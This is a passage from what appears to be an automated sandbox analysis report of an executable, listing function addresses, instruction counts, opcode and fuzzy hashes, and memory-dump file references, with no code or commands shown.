                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b14a04dd6bdce6d3c84cf2c82878dd7ecb710331ddf643e538226ead79392ace
                                        • Instruction ID: 0cda85abb7452127cd12cb2ebe9413b4cc21f92f89fbe3e1885840522b59de3c
                                        • Opcode Fuzzy Hash: b14a04dd6bdce6d3c84cf2c82878dd7ecb710331ddf643e538226ead79392ace
                                        • Instruction Fuzzy Hash: 1342A0706047618FD725CF19E094665FFE2BF9B310F288A6EC4868B7D2D635E885CB90
                                        Function 0055AC28 Relevance: .5, Instructions: 501COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 33a3ecce9cf6c937e2f0c1d2d9b4c4764a8803e2c9e6f8b29af544e94c312f39
                                        • Instruction ID: a79bda8530ddaebb018d95cf968b740a6adc9085d53f697576ea4872f20c512e
                                        • Opcode Fuzzy Hash: 33a3ecce9cf6c937e2f0c1d2d9b4c4764a8803e2c9e6f8b29af544e94c312f39
                                        • Instruction Fuzzy Hash: B302E471E002168FDB11CF28C8916AFBBA2BFDA341F15872BEC15B7651D770AD858790
                                        Function 005398B8 Relevance: .5, Instructions: 482COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2ec5425ea166261dbb47060f071532c3a8487158838a74badd6abe20aeed5f87
                                        • Instruction ID: 390d2d2436a640acdd370948380e659a16dd884c9c49fc40ec6fc71e5a83ccfd
                                        • Opcode Fuzzy Hash: 2ec5425ea166261dbb47060f071532c3a8487158838a74badd6abe20aeed5f87
                                        • Instruction Fuzzy Hash: 0002F1B1A083058FDB15DF29C881369BBE1BFA5310F148B2DEC999B352D7B1EC858B41
                                        Function 005266C8 Relevance: .4, Instructions: 418COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b8d9d4345e8cdc0c09525c5bce3898901bb43f275b80ce7cbd30b98cf4a35ec9
                                        • Instruction ID: d10fb3d3c5ca736dddcc8b91b45cebcb53ba29f3c16a7002dc2dd8425a8ae5cd
                                        • Opcode Fuzzy Hash: b8d9d4345e8cdc0c09525c5bce3898901bb43f275b80ce7cbd30b98cf4a35ec9
                                        • Instruction Fuzzy Hash: 4EF16AB25086A14BC71D9A1494B08BD7FD2AFAA201F0E86ADFDD60F393D924DA01DB51
                                        Function 0056B308 Relevance: .4, Instructions: 415COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 57d5d0b81d74e29e3200a1e995e817443f7765a17d79ee01e02cba8c1ad760b9
                                        • Instruction ID: f9e329ba1176929c19680b94d9f916acf49fd2f48af0c3d168692d6d8a189355
                                        • Opcode Fuzzy Hash: 57d5d0b81d74e29e3200a1e995e817443f7765a17d79ee01e02cba8c1ad760b9
                                        • Instruction Fuzzy Hash: 51D17473F10A254BFB08CA99DC923ADB6E2FBD8350F19413ED916E7381D6B89D418790
                                        Function 00550B88 Relevance: .4, Instructions: 378COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8086af1eee23c2ec03667c4df963516334ec34816eb8b1db30eae6a2209b88cb
                                        • Instruction ID: f990615dbb9d751c13d08b620f473431ed23e9e4c74e243e81e5f4e97547352a
                                        • Opcode Fuzzy Hash: 8086af1eee23c2ec03667c4df963516334ec34816eb8b1db30eae6a2209b88cb
                                        • Instruction Fuzzy Hash: 61D1E372E002198BDF24CF98D8A47EEBBB1BF89311F14922AED15A72D1D7345D4A8B50
                                        Function 0053B8A8 Relevance: .4, Instructions: 376COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 785eda4873c2745347b995e3ca024bc6e41954b75693d86a30469ec7c1fde165
                                        • Instruction ID: 4bfafa1de4ab4b8104aeafd7915a723bc023a67971b96608c6297f812b3df37a
                                        • Opcode Fuzzy Hash: 785eda4873c2745347b995e3ca024bc6e41954b75693d86a30469ec7c1fde165
                                        • Instruction Fuzzy Hash: 0D026974E006598FCF26CFA8C4905EDBBB6FF8D310F548159E899AB355C730AA91CB90
                                        Function 0053BD68 Relevance: .4, Instructions: 372COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b3095706403d8b2753a0f449caab4ca3cbf951e9973f819c05ee5ac836afa2e6
                                        • Instruction ID: 0997ea8398502aed5c1b4deaf68c3273bc3ad411b68f09f124500f9a8a5efc5b
                                        • Opcode Fuzzy Hash: b3095706403d8b2753a0f449caab4ca3cbf951e9973f819c05ee5ac836afa2e6
                                        • Instruction Fuzzy Hash: 51020175E00619CFCB15CF98C4809ADBBB6FF88350F258569E80ABB355D731AA91CF90
                                        Function 0055A648 Relevance: .3, Instructions: 339COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0415d5d4d33c4cbc98ebcd4e02f38613755f15d71f03d46d3ad1f802428a958c
                                        • Instruction ID: 09491da2ca058f0dd3cd339ca893a997ac71f837760c3f263ec042385ad33321
                                        • Opcode Fuzzy Hash: 0415d5d4d33c4cbc98ebcd4e02f38613755f15d71f03d46d3ad1f802428a958c
                                        • Instruction Fuzzy Hash: D7C14876E29B824BD713863DD802265E795BFE7290F05D72BFCE472982FB2096858244
                                        Function 0054AD38 Relevance: .3, Instructions: 302COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a1bf99ec60eeecf1be959f5a4ef1b966c18603a01db15cb0710963bbc3f2451f
                                        • Instruction ID: 08f70aad0b8bb011f098146d362fea140f0e85afc23de7b42d67f2403b9ecf36
                                        • Opcode Fuzzy Hash: a1bf99ec60eeecf1be959f5a4ef1b966c18603a01db15cb0710963bbc3f2451f
                                        • Instruction Fuzzy Hash: 5ED14874600B41CFE725CF29C494BA7BBE0BB49308F14892ED89B8BB51D735E949CB91
                                        Function 0053D720 Relevance: .3, Instructions: 295COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6d6835ef883b13d007bd8ff82b789808819c9fcac3ce35a3119cc9747a60bc0b
                                        • Instruction ID: 98b334ce52bf4846b3a5983b105031996945750be7d19b449c40ec4197df70e0
                                        • Opcode Fuzzy Hash: 6d6835ef883b13d007bd8ff82b789808819c9fcac3ce35a3119cc9747a60bc0b
                                        • Instruction Fuzzy Hash: FDD12BB01083818FD7158F15D0A872BBFF0BF95708F19895DE4D90B391D7BA8948DBA2
                                        Function 005245A8 Relevance: .3, Instructions: 291COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8c42632ac257159b6d5ab4821e07f9a6543e16090cbe3aac95ea3addfbaf7a13
                                        • Instruction ID: 8babfe0e3d181cc368732d4878da2816be2e7744c8a68171cc962feac2a8ae16
                                        • Opcode Fuzzy Hash: 8c42632ac257159b6d5ab4821e07f9a6543e16090cbe3aac95ea3addfbaf7a13
                                        • Instruction Fuzzy Hash: 53B18E72A083519BD308CF25C89176BF7E2FFC8310F1AC93EE89997291D774D9459A82
                                        Function 00511D78 Relevance: .3, Instructions: 291COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
